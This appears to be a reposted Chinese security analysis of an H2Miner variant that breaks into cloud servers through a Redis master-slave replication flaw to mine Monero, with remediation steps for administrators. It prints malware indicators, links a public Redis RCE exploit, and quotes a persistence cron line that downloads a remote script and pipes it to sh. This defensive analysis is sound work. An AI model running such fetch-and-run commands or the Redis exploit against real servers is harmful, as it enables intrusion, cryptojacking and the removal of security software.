H2Miner变种,利用Redis漏洞入侵云服务器wa矿

这篇具有很好参考价值的文章主要介绍了H2Miner变种,利用Redis漏洞入侵云服务器wa矿。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

H2Miner变种,最主要的特征是,入侵后 redis路径下很明显多了两个可执行的so文件,red2.so 和 exp_lin.so ;

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

该变种利用Redis 4.x/5.x 主从同步命令执行漏洞(CNVD-2019-21763)攻击云服务器,检测数据显示该木马活动有明显增长。H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。

2Miner变种木马入侵后会下载kinsingXXXXXXXXXX(10位随机字符)木马作为挖矿木马kdevtmpfsi的维持进程,并且通过安装定时任务持久化、通过SSH复用连接进行横向移动感染。H2Miner挖矿木马会占用大量CPU资源进行挖矿计算,可能导致业务系统崩溃,该挖矿木马还会尝试卸载云服务器的安全软件。腾讯安全专家建议企业用户按照以下步骤进行自查以及处置:

1.Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令;

2.修改配置文件,限制访问Redis服务器的IP地址(bind 127.0.0.1或指定IP);

3.排查Redis路径下是否残留red2.so、exp_lin.so文件,查询主机上是有否包含有kinsing(或kinsingXXXXXXXXXX)、kdevtmpfsi的文件或进程,是否有包含“195.3.146.118”的定时任务。

以上步骤可确认服务器是否被H2Miner挖矿木马感染,如有发现,可以删除相关进程文件及定时任务。

Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。

(https://github.com/Ridter/redis-rce/blob/master/redis-rce.py)

由于Redis 4.x以及之后的版本,Redis新增了模块功能,用户可以通过外部拓展实现用户需要的功能,这样就可以在Redis中实现一个新的Redis命令。攻击者利用此功能(由Redis的主机实例通过fullresync同步到从机),使被攻击机加载恶意的模块red2.so文件,从而实现远程命令执行。

H2Miner变种,利用Redis漏洞入侵云服务器wa矿
ed2.so实现了shell命令的执行功能,可以接受攻击者指定的任意代码。
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
随后攻击者通过执行远程命令在Redis目录(/www/server/redis/)中下载了三个可执行文件并运行,文件名为kinsing+“10个随机字符”:

insinghoeF6X2YuD

kinsinghUvG9LNzhs

kinsingOtaaHxvErd

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

对比发现三个文件其实相同,推测可能是由于重复入侵导致。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。

kinsingXXXXXXXXXX在函数main_redisBrute中实现redis爆破攻击功能。

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

该样本会继续下载门罗币挖矿木马/tmp/kdevtmpfsi启动挖矿,导致大量CPU资源被占用,影响机器正常运转。

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

下载http[:]//45.10.88.124/al.sh,尝试卸载阿里云骑士和腾讯云镜。

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

下载http[:]//45.10.88.124/cron.sh,安装定时任务:

“* * * * * $LDR http[:]//195.3.146.118/unk.sh | sh > /dev/null 2>&1”

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

下载http[:]//45.10.88.124/spre.sh,尝试利用SSH连接复用进行横向移动:

H2Miner变种,利用Redis漏洞入侵云服务器wa矿

与C2地址93.189.46.81通信。

H2Miner变种,利用Redis漏洞入侵云服务器wa矿文章来源地址https://www.toymoban.com/news/detail-507603.html

到了这里,关于H2Miner变种,利用Redis漏洞入侵云服务器wa矿的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 不死马的利用与克制(基于条件竞争)及变种不死马

    不死马即内存马,它会写进进程里,并且无限地在指定目录中生成木马文件 这里以PHP不死马为例 测试代码: 上面代码即为最简单的不死马,其目的是创建一个名为\\\".test.php\\\"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。 关于代码的详细解释: 1、i

    2024年02月07日
    浏览(41)
  • 漏洞复现Influxdb,H2database,couchDB,ElasticSearch

    一、Influxdb - 未授权访问 - Jwt 验证不当 默认端口: 8086 8088 influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数shared - secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 1 、借助https

    2023年04月10日
    浏览(29)
  • 数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb漏洞复现

    参考:influxdb CVE-2019-20933 靶场环境:vulhub 打开靶场进入环境: 访问: 端口扫描: 默认端口: 8086:用于客户端和服务端交互的HTTP API 8088 :用于提供备份和恢复的RPC服务 influxdb 是一款著名的时序数据库,其使用 jwt 作为鉴权方式。在用户开启了认证, 但未设置参数 shared-s

    2024年02月06日
    浏览(39)
  • 黑客入侵:福特汽车Sync3车机存在漏洞,黑客入侵可抹除系统数据

    据福特汽车公告,他们发现部分2021年至2022年车型的Sync3车机存在Wi-Fi漏洞,该漏洞可能被黑客利用来入侵并抹除车机内的系统数据。这一漏洞源于福特车系中采用的WL18xx MCP驱动程序的内存缓冲区溢位漏洞,其漏洞编号为CVE-2023-29468。 这一发现引发了对车辆网络安全的担忧。随

    2024年02月12日
    浏览(58)
  • Kali Linux利用MSF入侵安卓手机

    Kali Linux利用MSF入侵安卓手机 一、什么是msf msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 演示

    2024年02月10日
    浏览(44)
  • Sangfor华东天勇战队:h2数据库console命令执行( CVE-2021-42392 漏洞)

    1.1.100 = H2 Console = 2.0.204 此处复现版本1.4.197 启动项目如下 在Driver Class中输入javax.naming.InitialContext 在JDBCURL中输入jndi注入恶意链接 生成链接命令: 因为项目环境是jdk1.7,因此我们用1.7的jndi,其他版本均不生效 通过漏洞公布,可以看到是在org.h2.util.JdbcUtils.getConnection的javax.na

    2024年02月11日
    浏览(33)
  • 【应急响应】网站入侵篡改指南&Webshell内存马查杀&漏洞排查&时间分析

    应急响应: 1、抗拒绝服务攻击防范应对指南 2、勒索软件防范应对指南 3、钓鱼邮件攻击防范应对指南 4、网页篡改与后门攻击防范应对指南 5、网络安全漏洞防范应对指南 6、大规模数据泄露防范应对指南 7、僵尸网络感染防范应对指南 8、APT攻击入侵防范应对指南 9、各种辅

    2024年01月20日
    浏览(43)
  • 服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现

    目录 一、Influxdb-未授权访问-Jwt 验证不当 1、Infuxdb简介 2、安全问题 3、漏洞复现  二、H2database-未授权访问-配置不当 1、H2database简介 2、安全问题 3、漏洞复现  三、CouchDB-权限绕过配合RCE-漏洞 1、CouchDB简介 2、安全问题 3、漏洞复现  四 、ElasticSearch-文件写入RCE-漏洞 1、Ela

    2024年02月16日
    浏览(45)
  • 【rpcbind漏洞111端口入侵实战指南--关注紫灵小姐姐不踩坑】

    111端口rpcbind漏洞 最近扫描一个内网的ip,发现有一个不常见的端口开着,服务是rpcbind,上网一查还真是有漏洞。 该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。

    2024年02月15日
    浏览(48)
  • 6-14漏洞利用-rpcbind漏洞利用

    rpcbind介绍 通俗的来说,rpcbind是NFS中用来进行消息通知的服务。 一般情况下rpcbind运行在111、31端口。并且NFS配置开启 rpcbind_enable=“YES” 我们来探测当前机器的开放端口,一般开启了rpcbind,会有nfs网络共享的功能,nfs端口是2049 探测目标rpcbind 使用nmap -sV -p 111 IP地址 探测目标

    2024年01月25日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包